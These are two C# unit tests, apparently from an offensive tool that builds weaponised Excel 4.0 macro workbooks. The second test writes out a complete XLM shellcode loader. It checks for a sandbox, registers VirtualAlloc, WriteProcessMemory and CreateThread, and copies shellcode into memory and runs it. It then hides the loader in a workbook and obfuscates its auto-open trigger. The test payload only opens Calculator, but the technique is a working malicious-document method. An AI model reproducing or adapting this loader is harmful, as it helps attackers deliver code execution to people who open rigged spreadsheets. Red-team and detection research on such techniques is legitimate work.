예제 #1
0
        public void TestGenerateMacroForPayload()
        {
            byte[]        shellcode = TestHelpers.GetPopCalcShellcode();
            List <string> macros    = FormulaHelper.BuildPayloadMacros(shellcode);

            Assert.AreEqual("END", macros.Last());
        }
예제 #2
0
        public void InsertFormulaTest()
        {
            byte[]         wbBytes = TestHelpers.GetMacroTestBytes();
            WorkbookStream wbs     = new WorkbookStream(wbBytes);

            List <Formula> formulas          = wbs.GetAllRecordsByType <Formula>();
            int            numRecordsInSheet = formulas.Count - 1;

            List <string> macros = new List <string>()
            {
                "=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",
                "=ALERT(\"Into Payload Loader\",2)",
                "=REGISTER(\"Kernel32\",\"VirtualAlloc\",\"JJJJJ\",\"VA\",,1,0)",
                "=REGISTER(\"Kernel32\",\"CreateThread\",\"JJJJJJJ\",\"CT\",,1,0)",
                "=REGISTER(\"Kernel32\",\"WriteProcessMemory\",\"JJJCJJ\",\"WPM\",,1,0)",
                "=VA(0,1000000,4096,64)",
                "=SELECT(R1C3)",
                "=SET.VALUE(R1C4,0)",
                "=WHILE(ACTIVE.CELL()<>\"END\")",
                "=WPM(-1,R6C2+R1C4,ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)",
                "=SET.VALUE(R1C4,R1C4+LEN(ACTIVE.CELL()))",
                "=SELECT(,\"R[1]C\")",
                "=NEXT()",
                "=ALERT(\"Popping Calc\",2)",
                "=CT(0,0,R6C2,0,0,0)",
                "=ALERT(\"Closing Thread\",2)",
                "=HALT()"
            };

            List <string> payload = FormulaHelper.BuildPayloadMacros(TestHelpers.GetPopCalcShellcode());

            List <BiffRecord> formulasToAdd = FormulaHelper.ConvertStringsToRecords(macros, numRecordsInSheet, 0, 0, 1);

            formulasToAdd.AddRange(FormulaHelper.ConvertStringsToRecords(payload, numRecordsInSheet + formulasToAdd.Count, 0, 0, 2));

            Formula haltFormula         = formulas.Last();
            Formula modifiedHaltFormula = ((BiffRecord)haltFormula.Clone()).AsRecordType <Formula>();

            modifiedHaltFormula.rw = (ushort)(numRecordsInSheet + formulasToAdd.Count);

            Formula gotoFormula = FormulaHelper.GetGotoFormulaForCell(modifiedHaltFormula.rw, modifiedHaltFormula.col, 0, 1);

            WorkbookStream modifiedStream = wbs.InsertRecords(formulasToAdd, haltFormula);

            modifiedStream = modifiedStream.ReplaceRecord(haltFormula, gotoFormula);

            modifiedStream = modifiedStream.ObfuscateAutoOpen();

            ExcelDocWriter writer = new ExcelDocWriter();

            writer.WriteDocument(TestHelpers.AssemblyDirectory + Path.DirectorySeparatorChar + "not-equals-parser-bug.xls", modifiedStream);
        }